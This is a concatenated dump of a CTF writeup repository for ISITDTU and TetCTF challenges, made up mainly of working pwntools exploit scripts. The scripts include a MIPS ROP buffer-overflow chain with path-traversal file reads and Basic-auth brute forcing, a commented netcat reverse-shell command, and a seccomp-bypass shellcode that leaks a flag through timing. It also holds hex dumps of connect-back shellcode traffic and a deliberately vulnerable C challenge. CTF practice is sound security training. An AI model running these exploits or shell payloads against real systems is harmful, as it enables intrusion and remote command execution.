"%s/cgi-bin/ping.cgi?ip=127.0.0.1&c=10&t=%s.html" % (url, t) 13 | request_headers = {"Authorization": "Basic %s" % base64.b64encode(username+":"+password)} 14 | try: 15 | requests.get(request_url, headers=request_headers, timeout=1) 16 | except requests.exceptions.ReadTimeout: 17 | pass 18 | 19 | request_url = "%s/cgi-bin/main.cgi?page=../../../../tmp/%s.html/../../%s" % (url, t, filename) 20 | r = requests.get(request_url, headers=request_headers) 21 | return r.text.strip() 22 | 23 | def getLibBase(url): 24 | maps = readfile("proc/self/maps", url) 25 | if "File Not Found" in maps: 26 | return False 27 | for m in maps.splitlines(): 28 | if "r-xp" in m and "libc.so.0" in m: 29 | return int(m.split("-")[0],16) 30 | break 31 | 32 | def flag1(url): 33 | request_url = "%s/cgi-bin/main.cgi?page=flag.html" % url 34 | for u in string.letters: 35 | for p in string.letters: 36 | request_headers = {"Authorization": "Basic %s" % base64.b64encode(u+":"+p)} 37 | r = requests.get(request_url, headers=request_headers) 38 | if r.status_code != 401: 39 | print("[+] Login Success with username=%s, password=%s" % (u, p)) 40 | print("[+] Flag: %s" % r.text.strip()) 41 | return 42 | 43 | def flag2(url, username, password): 44 | print("[+] Flag: %s" % readfile("flag", url, username, password)) 45 | 46 | def runCommand(command, url): 47 | context.arch = "mips" 48 | context.endian = "big" 49 | base = getLibBase(url) 50 | print("[+] Base Libc: %s" % hex(base)) 51 | if base == False: 52 | print("[-] Error to get libc base! Try again please!") 53 | return 54 | gadget1 = base + 0x00041a4c # addiu $a0, $sp, 0x18 ; lw $gp, 0x10($sp) ; lw $ra, 0x30($sp) ; nop ; jr $ra ; addiu $sp, $sp, 0x38 55 | gadget2 = base + 0x00041a40 # move $t9, $a0 ; sw $v0, 0x18($sp) ; jalr $t9 ; addiu $a0, $sp, 0x18 56 | 57 | shell = "" 58 | shell += pwnlib.shellcraft.mips.pushstr_array("$a1",["/bin/sh","-c", command]) 59 | shell += "lw $a0, 0($a1)\n" # a0 => /bin/sh (pathname) 60 | shell += "slti $a2, $zero, 0xFFFF\n" # a2 = null (env) 61 | shell += "ori $v0, $zero, SYS_execve\n" # SYS_execve 62 | shell += "syscall 0x40404\n" 63 | 64 | username = "admin" 65 | password = "A"*(0x80+0x14) 66 | password += p32(gadget1) 67 | password += "B"*0x1c 68 | password += asm("addiu $sp, $sp, 0x0104 ; jalr $sp ; move $a1, $s4") 69 | password += "C"*0x0c 70 | password += p32(gadget2) 71 | password += "D"*0x108 72 | password += pwnlib.encoders.encoder.null(asm(shell)) 73 | 74 | request_url = "%s/cgi-bin/main.cgi" % url 75 | request_headers = {"Authorization": "Basic %s" % base64.b64encode(username+":"+password)} 76 | requests.get(request_url, headers=request_headers) 77 | 78 | def flag3(url, username, password): 79 | # runCommand("nc 127.0.0.1 4646 -e /bin/bash") 80 | runCommand("/readflag > /tmp/quynhnhu5tuoi", url) 81 | print("[+] Flag: %s" % readfile("tmp/quynhnhu5tuoi", url, username, password)) 82 | runCommand("rm /tmp/quynhnhu5tuoi", url) 83 | 84 | 85 | 86 | def main(): 87 | print("[*] Author: phieulang1993") 88 | parser = argparse.ArgumentParser() 89 | parser.add_argument('--url', help='target\'s url') 90 | parser.add_argument('--flag', '-f', help='flag 1, 2 or 3') 91 | parser.add_argument('--username', '-u', help='username for flag 2 or 3') 92 | parser.add_argument('--password', '-p', help='password for flag 2 or 3') 93 | 94 | args = parser.parse_args() 95 | if args.url == None and args.flag == None: 96 | parser.print_help() 97 | sys.exit() 98 | 99 | url = args.url 100 | if url[-1] == "/": 101 | url = url[:-1] 102 | if "http://" not in url: 103 | url = "http://{0}".format(url) 104 | 105 | f = int(args.flag) 106 | if f == 1: 107 | flag1(url) 108 | elif f == 2: 109 | flag2(url, args.username, args.password) 110 | elif f == 3: 111 | flag3(url, args.username, args.password) 112 | else: 113 | parser.print_help() 114 | sys.exit() 115 | 116 | if __name__ == '__main__': 117 | main() 118 | 119 | # python solve.py --url="34.126.182.54" --flag=3 --username=a --password=S 120 | # python solve.py --url="34.125.0.41" --flag=1 --username=a --password=S -------------------------------------------------------------------------------- /2022/ISITDTU CTF 2022 FINALS/whitelist_sc/whitelist_sc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2022/ISITDTU CTF 2022 FINALS/whitelist_sc/whitelist_sc -------------------------------------------------------------------------------- /2022/ISITDTU CTF 2022 FINALS/whitelist_sc/whitelist_sc.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | from pwn import * 3 | from time import time 4 | context.arch = "amd64" 5 | r = None 6 | 7 | if len(sys.argv) < 3: 8 | print("Usage: python %s IP PORT" % sys.argv[0]) 9 | exit(1) 10 | 11 | 12 | def challenge(ip, port): 13 | DEBUG = 0 14 | 15 | if DEBUG: 16 | r = remote(ip, port) 17 | read_main = 0xC0DE044 18 | leave = 0xC0DE062 19 | rsp = 0xC0DE700 20 | shellcode_x86_addr = 0xC0DE100 21 | shellcode_x64_addr = 0xC0DE200 22 | flag_path_addr = 0xC0DE300 23 | flag_content_addr = 0xC0DE800 24 | 25 | r.recvline() # Whitelist: socket, preadv, exit_group, exit, read, sendmsg, setsockopt, exit_group, exit, lstat, getegid, capget, lgetxattr, chmod, getcwd, chdir 26 | r.recvline() # Read flag at /flag! 27 | payload = fit(leave, chr(read_main & 0xff)) 28 | shellcode_read_more = """ 29 | mov dx, 0x500 30 | mov al, 0 31 | syscall 32 | """ 33 | shellcode_read_more = asm(shellcode_read_more, arch='amd64', bits=64) 34 | shellcode_read_more = shellcode_read_more.ljust(0x9, "\x90") 35 | payload += shellcode_read_more 36 | 37 | shellcode_switch_x86 = """ 38 | mov rsp, %d 39 | mov DWORD PTR [rsp], %d 40 | mov DWORD PTR [rsp+4], 0x23 41 | retf 42 | """ % (rsp, shellcode_x86_addr) 43 | 44 | shellcode_switch_x86 = "\x90" * \ 45 | (0xc0de06a-0xc0de062) + asm(shellcode_switch_x86, arch='amd64', bits=64) 46 | shellcode_switch_x86 = shellcode_switch_x86.ljust( 47 | 0xc0de100-0xc0de062, "\x90") 48 | 49 | shellcode_x86 = """ 50 | mov eax, 295 51 | mov ebx, 0xffffffff 52 | mov ecx, %d 53 | mov edx, 0 54 | int 0x80 55 | mov esp, %d 56 | mov DWORD PTR [esp], %d 57 | mov DWORD PTR [esp+4], 0x33 58 | retf 59 | """ % (flag_path_addr, rsp, shellcode_x64_addr) 60 | shellcode_x86 = asm(shellcode_x86, arch='i386', bits=32).ljust( 61 | 0xc0de200-0xc0de100, "\x90") 62 | 63 | idx = 0 64 | bit_check = 1 65 | 66 | shellcode_x64 = """ 67 | mov rax, 0 68 | mov rdi, 3 69 | mov rsi, %d 70 | mov rdx, 0x1000 71 | syscall 72 | mov rcx, %d 73 | mov rax, %d 74 | mov bl, BYTE PTR [rax+rcx] 75 | shr bl, %d 76 | and bl, 0x1 77 | cmp bl, 0 78 | jne exit 79 | loop: 80 | jmp $ 81 | exit: 82 | mov rax, 60 83 | syscall 84 | """ % (flag_content_addr, idx, flag_content_addr, bit_check) 85 | 86 | shellcode_x64 = asm(shellcode_x64, arch='amd64', bits=64).ljust( 87 | 0xc0de300-0xc0de200, "\x90") 88 | 89 | payload += shellcode_switch_x86 90 | payload += shellcode_x86 91 | payload += shellcode_x64 92 | payload += "/etc/passwd\x00" 93 | r.send(payload) 94 | s = time() 95 | r.recvall(timeout=0.5) 96 | log.info("time: %f" % (time()-s)) 97 | r.interactive() 98 | else: 99 | idx = 0 100 | flag = "" 101 | context.log_level = 'critical' 102 | 103 | while 1: 104 | flag_char = 0 105 | for bit_check in range(7): 106 | r = remote(ip, port) 107 | r.recvuntil("Read flag at /flag\n") 108 | payload = "\x62\xe0\x0d\x0c\x00\x00\x00\x00\x44\x66\xba\x00\x05\xb0\x00\x0f\x05\x90\x90\x90\x90\x90\x90\x90\x90\x90\x48\xc7\xc4\x00\xe7\x0d\x0c\xc7\x04\x24\x00\xe1\x0d\x0c\xc7\x44\x24\x04\x23\x00\x00\x00\xcb\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xb8\x27\x01\x00\x00\xbb\xff\xff\xff\xff\xb9\x00\xe3\x0d\x0c\xba\x00\x00\x00\x00\xcd\x80\xbc\x00\xe7\x0d\x0c\xc7\x04\x24\x00\xe2\x0d\x0c\xc7\x44\x24\x04\x33\x00\x00\x00\xcb\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x48\xc7\xc0\x00\x00\x00\x00\x48\xc7\xc7\x03\x00\x00\x00\x48\xc7\xc6\x00\xe8\x0d\x0c\x48\xc7\xc2\x00\x10\x00\x00\x0f\x05\x48\xc7\xc1" + \ 109 | chr(idx) + "\x00\x00\x00\x48\xc7\xc0\x00\xe8\x0d\x0c\x8a\x1c\x08\xc0\xeb" + chr(bit_check) + "\x80\xe3\x01\x80\xfb\x00\x75\x02\xeb\xfe\x48\xc7\xc0\x3c\x00\x00\x00\x0f\x05\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"+"/flag\x00" 110 | r.send(payload) 111 | s = time() 112 | to = 0.5 113 | r.recvall(timeout=to) 114 | if time()-s < to: 115 | flag_char += 2**bit_check 116 | if flag_char == 0: 117 | exit() 118 | idx += 1 119 | flag += chr(flag_char) 120 | print(flag) 121 | 122 | 123 | challenge(sys.argv[1], int(sys.argv[2])) 124 | -------------------------------------------------------------------------------- /2022/TetCTF 2023/pwn01/1MB: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2022/TetCTF 2023/pwn01/1MB -------------------------------------------------------------------------------- /2022/TetCTF 2023/pwn01/chall: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2022/TetCTF 2023/pwn01/chall -------------------------------------------------------------------------------- /2022/TetCTF 2023/pwn01/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2022/TetCTF 2023/pwn01/libc.so.6 -------------------------------------------------------------------------------- /2023/ISITDTU CTF QUALS 2023/pivot/packets_cleartext.pcap: -------------------------------------------------------------------------------- 1 | 00000000 46 69 6e 64 20 66 6c 61 67 Find fla g 2 | 00000009 0a . 3 | 00000000 68 08 41 40 00 41 5a 6a 29 58 6a 02 5f 6a 01 5e h.A@.AZj )Xj._j.^ 4 | 00000010 99 0f 05 48 89 c5 48 b8 01 01 01 01 01 01 01 01 ...H..H. ........ 5 | 00000020 50 48 b8 03 01 0d eb 0b 0b 0b 02 48 31 04 24 6a PH...... ...H1.$j 6 | 00000030 2a 58 48 89 ef 6a 10 5a 48 89 e6 0f 05 31 c0 48 *XH..j.Z H....1.H 7 | 00000040 89 ef 31 d2 b6 05 4c 89 d6 0f 05 6a 01 5f 48 89 ..1...L. ...j._H. 8 | 00000050 c2 4c 89 d6 6a 01 58 0f 05 31 c0 31 ff 31 d2 b6 .L..j.X. .1.1.1.. 9 | 00000060 05 4c 89 d6 0f 05 48 89 ef 48 89 c2 4c 89 d6 6a .L....H. .H..L..j 10 | 00000070 01 58 0f 05 31 c0 48 89 ef 31 d2 b6 05 4c 89 d6 .X..1.H. .1...L.. 11 | 00000080 0f 05 6a 01 5f 48 89 c2 4c 89 d6 6a 01 58 0f 05 ..j._H.. L..j.X.. 12 | 00000090 41 80 7a 05 03 74 1b 31 c0 31 ff 31 d2 b6 05 4c A.z..t.1 .1.1...L 13 | 000000A0 89 d6 0f 05 48 89 ef 48 89 c2 4c 89 d6 6a 01 58 ....H..H ..L..j.X 14 | 000000B0 0f 05 31 c0 48 89 ef 31 d2 b6 05 4c 89 d6 0f 05 ..1.H..1 ...L.... 15 | 000000C0 6a 01 5f 48 89 c2 4c 89 d6 6a 01 58 0f 05 eb c7 j._H..L. .j.X.... 16 | 0000000A 49 00 00 00 0a 38 2e 31 2e 30 00 c0 00 00 00 1a I....8.1 .0...... 17 | 0000001A 44 52 75 6e 21 19 7a 00 ff ff ff 02 00 ff df 15 DRun!.z. ........ 18 | 0000002A 00 00 00 00 00 00 00 00 00 00 36 4b 1c 3f 60 04 ........ ..6K.?`. 19 | 0000003A 37 40 01 57 40 57 00 63 61 63 68 69 6e 67 5f 73 7@.W@W.c aching_s 20 | 0000004A 68 61 32 5f 70 61 73 73 77 6f 72 64 00 ha2_pass word. 21 | 000000D0 e5 00 00 01 8d a2 bf 00 00 00 00 01 21 00 00 00 ........ ....!... 22 | 000000E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ 23 | 000000F0 00 00 00 00 69 73 69 74 64 74 75 00 20 b1 dd 5b ....isit dtu. ..[ 24 | 00000100 0e 3f 07 05 a4 cf e0 66 2c bf 4c 34 fe 6e df b0 .?.....f ,.L4.n.. 25 | 00000110 f6 77 7d 8b 89 bc 27 cd 8b c7 f2 fd 51 66 6c 34 .w}...'. ....Qfl4 26 | 00000120 67 00 63 61 63 68 69 6e 67 5f 73 68 61 32 5f 70 g.cachin g_sha2_p 27 | 00000130 61 73 73 77 6f 72 64 00 80 03 5f 6f 73 05 4c 69 assword. .._os.Li 28 | 00000140 6e 75 78 0c 5f 63 6c 69 65 6e 74 5f 6e 61 6d 65 nux._cli ent_name 29 | 00000150 0a 6c 69 62 6d 61 72 69 61 64 62 04 5f 70 69 64 .libmari adb._pid 30 | 00000160 07 33 33 35 31 39 37 37 0f 5f 63 6c 69 65 6e 74 .3351977 ._client 31 | 00000170 5f 76 65 72 73 69 6f 6e 05 33 2e 33 2e 35 09 5f _version .3.3.5._ 32 | 00000180 70 6c 61 74 66 6f 72 6d 06 78 38 36 5f 36 34 0c platform .x86_64. 33 | 00000190 70 72 6f 67 72 61 6d 5f 6e 61 6d 65 05 6d 79 73 program_ name.mys 34 | 000001A0 71 6c 0c 5f 73 65 72 76 65 72 5f 68 6f 73 74 09 ql._serv er_host. 35 | 000001B0 6c 6f 63 61 6c 68 6f 73 74 localhos t 36 | 00000057 02 00 00 02 01 03 ...... 37 | 0000005D 10 00 00 03 00 00 00 02 40 00 00 00 07 01 05 04 ........ @....... 38 | 0000006D 66 6c 34 67 fl4g 39 | 000001B9 13 00 00 00 03 73 65 6c 65 63 74 20 2a 20 66 72 .....sel ect * fr 40 | 000001C9 6f 6d 20 66 6c 34 67 om fl4g 41 | 00000071 01 00 00 01 01 2a 00 00 02 03 64 65 66 04 66 6c .....*.. ..def.fl 42 | 00000081 34 67 04 66 6c 34 67 04 66 6c 34 67 04 66 6c 61 4g.fl4g. fl4g.fla 43 | 00000091 67 04 66 6c 61 67 0c 21 00 fd 02 00 00 fd 00 00 g.flag.! ........ 44 | 000000A1 00 00 00 05 00 00 03 fe 00 00 22 00 25 00 00 04 ........ ..".%... 45 | 000000B1 24 49 53 49 54 44 54 55 7b 70 69 76 30 74 5f 69 $ISITDTU {piv0t_i 46 | 000000C1 35 5f 6e 30 54 5f 76 33 72 79 5f 64 69 46 66 69 5_n0T_v3 ry_diFfi 47 | 000000D1 63 55 6c 54 7d 05 00 00 05 fe 00 00 22 00 cUlT}... ....". 48 | 000001D0 01 00 00 00 01 ..... 49 | -------------------------------------------------------------------------------- /2023/ISITDTU CTF QUALS 2023/pivot/packets_pubkey.pcap: -------------------------------------------------------------------------------- 1 | 00000000 46 69 6e 64 20 66 6c 61 67 Find fla g 2 | 00000009 0a . 3 | 00000000 68 08 41 40 00 41 5a 6a 29 58 6a 02 5f 6a 01 5e h.A@.AZj )Xj._j.^ 4 | 00000010 99 0f 05 48 89 c5 48 b8 01 01 01 01 01 01 01 01 ...H..H. ........ 5 | 00000020 50 48 b8 03 01 0d eb 0b 0b 0b 02 48 31 04 24 6a PH...... ...H1.$j 6 | 00000030 2a 58 48 89 ef 6a 10 5a 48 89 e6 0f 05 31 c0 48 *XH..j.Z H....1.H 7 | 00000040 89 ef 31 d2 b6 05 4c 89 d6 0f 05 6a 01 5f 48 89 ..1...L. ...j._H. 8 | 00000050 c2 4c 89 d6 6a 01 58 0f 05 31 c0 31 ff 31 d2 b6 .L..j.X. .1.1.1.. 9 | 00000060 05 4c 89 d6 0f 05 48 89 ef 48 89 c2 4c 89 d6 6a .L....H. .H..L..j 10 | 00000070 01 58 0f 05 31 c0 48 89 ef 31 d2 b6 05 4c 89 d6 .X..1.H. .1...L.. 11 | 00000080 0f 05 6a 01 5f 48 89 c2 4c 89 d6 6a 01 58 0f 05 ..j._H.. L..j.X.. 12 | 00000090 41 80 7a 05 03 74 1b 31 c0 31 ff 31 d2 b6 05 4c A.z..t.1 .1.1...L 13 | 000000A0 89 d6 0f 05 48 89 ef 48 89 c2 4c 89 d6 6a 01 58 ....H..H ..L..j.X 14 | 000000B0 0f 05 31 c0 48 89 ef 31 d2 b6 05 4c 89 d6 0f 05 ..1.H..1 ...L.... 15 | 000000C0 6a 01 5f 48 89 c2 4c 89 d6 6a 01 58 0f 05 eb c7 j._H..L. .j.X.... 16 | 0000000A 49 00 00 00 0a 38 2e 31 2e 30 00 08 00 00 00 26 I....8.1 .0.....& 17 | 0000001A 1e 6f 61 05 34 77 72 00 ff ff ff 02 00 ff df 15 .oa.4wr. ........ 18 | 0000002A 00 00 00 00 00 00 00 00 00 00 77 2e 2e 1d 07 61 ........ ..w....a 19 | 0000003A 19 5d 28 29 29 48 00 63 61 63 68 69 6e 67 5f 73 .]())H.c aching_s 20 | 0000004A 68 61 32 5f 70 61 73 73 77 6f 72 64 00 ha2_pass word. 21 | 000000D0 e5 00 00 01 8d a2 bf 00 00 00 00 01 21 00 00 00 ........ ....!... 22 | 000000E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ 23 | 000000F0 00 00 00 00 69 73 69 74 64 74 75 00 20 4f 98 b2 ....isit dtu. O.. 24 | 00000100 74 f9 d2 85 f6 90 69 0b 7a cb 1a c5 a8 ba 58 3d t.....i. z.....X= 25 | 00000110 b9 bb 84 26 a1 9d 0c 11 4f 57 75 4e 4e 66 6c 34 ...&.... OWuNNfl4 26 | 00000120 67 00 63 61 63 68 69 6e 67 5f 73 68 61 32 5f 70 g.cachin g_sha2_p 27 | 00000130 61 73 73 77 6f 72 64 00 80 03 5f 6f 73 05 4c 69 assword. .._os.Li 28 | 00000140 6e 75 78 0c 5f 63 6c 69 65 6e 74 5f 6e 61 6d 65 nux._cli ent_name 29 | 00000150 0a 6c 69 62 6d 61 72 69 61 64 62 04 5f 70 69 64 .libmari adb._pid 30 | 00000160 07 33 33 35 34 34 30 36 0f 5f 63 6c 69 65 6e 74 .3354406 ._client 31 | 00000170 5f 76 65 72 73 69 6f 6e 05 33 2e 33 2e 35 09 5f _version .3.3.5._ 32 | 00000180 70 6c 61 74 66 6f 72 6d 06 78 38 36 5f 36 34 0c platform .x86_64. 33 | 00000190 70 72 6f 67 72 61 6d 5f 6e 61 6d 65 05 6d 79 73 program_ name.mys 34 | 000001A0 71 6c 0c 5f 73 65 72 76 65 72 5f 68 6f 73 74 09 ql._serv er_host. 35 | 000001B0 6c 6f 63 61 6c 68 6f 73 74 localhos t 36 | 00000057 02 00 00 02 01 04 ...... 37 | 000001B9 01 00 00 03 02 ..... 38 | 0000005D c4 01 00 04 01 2d 2d 2d 2d 2d 42 45 47 49 4e 20 .....--- --BEGIN 39 | 0000006D 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a PUBLIC K EY-----. 40 | 0000007D 4d 49 49 42 49 6a 41 4e 42 67 6b 71 68 6b 69 47 MIIBIjAN BgkqhkiG 41 | 0000008D 39 77 30 42 41 51 45 46 41 41 4f 43 41 51 38 41 9w0BAQEF AAOCAQ8A 42 | 0000009D 4d 49 49 42 43 67 4b 43 41 51 45 41 79 75 4f 53 MIIBCgKC AQEAyuOS 43 | 000000AD 31 78 31 32 55 66 2f 30 4d 76 34 37 69 74 79 35 1x12Uf/0 Mv47ity5 44 | 000000BD 0a 70 55 32 57 71 53 73 51 41 73 54 65 6f 32 50 .pU2WqSs QAsTeo2P 45 | 000000CD 6f 4a 74 38 44 35 52 66 64 37 52 79 37 6f 68 72 oJt8D5Rf d7Ry7ohr 46 | 000000DD 51 46 53 52 49 33 41 45 50 34 72 63 50 62 6e 58 QFSRI3AE P4rcPbnX 47 | 000000ED 44 65 74 72 76 56 5a 59 52 34 4d 4c 79 56 74 46 DetrvVZY R4MLyVtF 48 | 000000FD 4a 0a 47 78 62 4c 30 61 6f 49 42 45 75 75 76 30 J.GxbL0a oIBEuuv0 49 | 0000010D 4d 77 69 33 6b 48 57 54 65 2b 34 59 64 53 6c 64 Mwi3kHWT e+4YdSld 50 | 0000011D 73 4b 73 6e 41 4f 5a 77 44 62 33 43 35 44 30 47 sKsnAOZw Db3C5D0G 51 | 0000012D 75 63 4a 6a 6f 4d 38 64 76 6d 42 56 6b 39 31 36 ucJjoM8d vmBVk916 52 | 0000013D 6a 4a 0a 54 37 30 43 65 34 66 62 4e 53 51 57 48 jJ.T70Ce 4fbNSQWH 53 | 0000014D 34 54 34 54 34 4b 42 38 37 38 30 72 4c 58 68 42 4T4T4KB8 780rLXhB 54 | 0000015D 79 47 6b 63 61 56 4c 47 74 75 32 37 46 71 69 36 yGkcaVLG tu27Fqi6 55 | 0000016D 6e 36 50 34 4d 4f 63 31 67 62 7a 72 59 63 6b 62 n6P4MOc1 gbzrYckb 56 | 0000017D 4f 43 75 0a 74 63 74 65 6a 4f 63 76 41 52 6d 33 OCu.tcte jOcvARm3 57 | 0000018D 71 4f 49 63 68 4c 39 71 43 65 37 74 56 56 45 2f qOIchL9q Ce7tVVE/ 58 | 0000019D 76 49 58 4c 59 6c 46 62 53 51 35 65 57 2f 6a 52 vIXLYlFb SQ5eW/jR 59 | 000001AD 32 37 70 44 63 53 50 52 74 79 66 47 6b 78 57 47 27pDcSPR tyfGkxWG 60 | 000001BD 6b 46 70 4a 0a 52 58 56 49 6a 4d 55 4f 71 61 50 kFpJ.RXV IjMUOqaP 61 | 000001CD 78 32 58 49 7a 2f 55 6f 43 45 2f 42 47 50 69 77 x2XIz/Uo CE/BGPiw 62 | 000001DD 71 56 77 53 57 6c 46 79 6e 65 35 42 47 75 77 46 qVwSWlFy ne5BGuwF 63 | 000001ED 69 68 72 2b 5a 6f 37 52 64 68 50 45 58 63 34 63 ihr+Zo7R dhPEXc4c 64 | 000001FD 55 6f 2b 64 73 0a 30 51 49 44 41 51 41 42 0a 2d Uo+ds.0Q IDAQAB.- 65 | 0000020D 2d 2d 2d 2d 45 4e 44 20 50 55 42 4c 49 43 20 4b ----END PUBLIC K 66 | 0000021D 45 59 2d 2d 2d 2d 2d 0a EY-----. 67 | 000001BE 00 01 00 05 ab 20 73 ff 57 43 91 3c 3f 53 21 0c ..... s. WC..> t..#..4. 78 | 0000026E 7e d2 f3 9e 09 32 99 2f a6 8b b2 76 b0 6a ae d0 ~....2./ ...v.j.. 79 | 0000027E e1 ca 18 c3 7b 21 6b 02 46 eb 63 23 67 18 ec 3d ....{!k. F.c#g..= 80 | 0000028E e1 4e a1 99 db d4 f6 bf 58 20 70 bd 1b 8c 24 3c .N...... X p...$< 81 | 0000029E f9 e0 41 46 2e a6 68 61 03 dc 33 e9 cd 00 e8 b0 ..AF..ha ..3..... 82 | 000002AE e0 05 2c 97 a4 24 e2 98 2f 9d fa 17 76 3b 75 9c ..,..$.. /...v;u. 83 | 000002BE 31 8d 01 2c 1.., 84 | 00000225 10 00 00 06 00 00 00 02 40 00 00 00 07 01 05 04 ........ @....... 85 | 00000235 66 6c 34 67 fl4g 86 | 000002C2 13 00 00 00 03 73 65 6c 65 63 74 20 2a 20 66 72 .....sel ect * fr 87 | 000002D2 6f 6d 20 66 6c 34 67 om fl4g 88 | 00000239 01 00 00 01 01 2a 00 00 02 03 64 65 66 04 66 6c .....*.. ..def.fl 89 | 00000249 34 67 04 66 6c 34 67 04 66 6c 34 67 04 66 6c 61 4g.fl4g. fl4g.fla 90 | 00000259 67 04 66 6c 61 67 0c 21 00 fd 02 00 00 fd 00 00 g.flag.! ........ 91 | 00000269 00 00 00 05 00 00 03 fe 00 00 22 00 25 00 00 04 ........ ..".%... 92 | 00000279 24 49 53 49 54 44 54 55 7b 70 69 76 30 74 5f 69 $ISITDTU {piv0t_i 93 | 00000289 35 5f 6e 30 54 5f 76 33 72 79 5f 64 69 46 66 69 5_n0T_v3 ry_diFfi 94 | 00000299 63 55 6c 54 7d 05 00 00 05 fe 00 00 22 00 cUlT}... ....". 95 | 000002D9 01 00 00 00 01 ..... 96 | -------------------------------------------------------------------------------- /2023/ISITDTU CTF QUALS 2023/pivot/pivot.c: -------------------------------------------------------------------------------- 1 | // sudo apt-get install libseccomp-dev 2 | // gcc pivot.c -o pivot -fno-stack-protector -no-pie -s -lseccomp 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | 10 | 11 | void init_seccomp() 12 | { 13 | scmp_filter_ctx ctx = NULL; 14 | ctx = seccomp_init(SCMP_ACT_ALLOW); 15 | if (ctx == NULL) 16 | { 17 | { 18 | printf("seccomp error\\n"); 19 | exit(0); 20 | } 21 | } 22 | seccomp_rule_add(ctx, SCMP_ACT_KILL, SCMP_SYS(execve), 0); 23 | seccomp_rule_add(ctx, SCMP_ACT_KILL, SCMP_SYS(execveat), 0); 24 | seccomp_rule_add(ctx, SCMP_ACT_KILL, SCMP_SYS(kill), 0); 25 | seccomp_rule_add(ctx, SCMP_ACT_KILL, SCMP_SYS(tkill), 0); 26 | seccomp_load(ctx); 27 | } 28 | 29 | void timeout() 30 | { 31 | exit(1); 32 | } 33 | 34 | void setup() 35 | { 36 | setbuf(stdin, 0); 37 | setbuf(stdout, 0); 38 | setbuf(stderr, 0); 39 | signal(SIGALRM, timeout); 40 | alarm(60); 41 | } 42 | int main() 43 | { 44 | int (*ret)(); 45 | char *addr; 46 | addr = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANON | MAP_PRIVATE, -1, 0); 47 | setup(); 48 | init_seccomp(); 49 | puts("Blacklist: execve, execveat, kill, tkill\nFind flag"); 50 | read(0, addr, 0x1000); 51 | ret = addr; 52 | ret(); 53 | return 0; 54 | } -------------------------------------------------------------------------------- /2023/ISITDTU CTF QUALS 2023/pivot/pivot.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys, os 4 | context.arch = 'amd64' 5 | def pivot(DEBUG): 6 | if DEBUG=='1': 7 | r = process('./pivot') 8 | # raw_input('debug?') 9 | elif DEBUG=='2': 10 | HOST = '34.126.117.161' 11 | PORT = 9999 12 | r = remote(HOST,PORT) 13 | 14 | 